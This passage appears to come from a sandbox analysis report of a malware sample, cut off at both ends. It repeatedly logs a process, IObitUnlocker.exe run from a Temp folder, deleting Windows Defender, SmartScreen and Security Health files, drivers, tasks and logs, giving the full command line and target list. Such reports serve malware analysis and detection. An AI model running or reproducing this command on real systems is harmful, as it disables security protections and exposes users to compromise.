Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10484
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:11056
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:11000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:9256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:10304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:10548
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:9584
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:10264
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10976
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 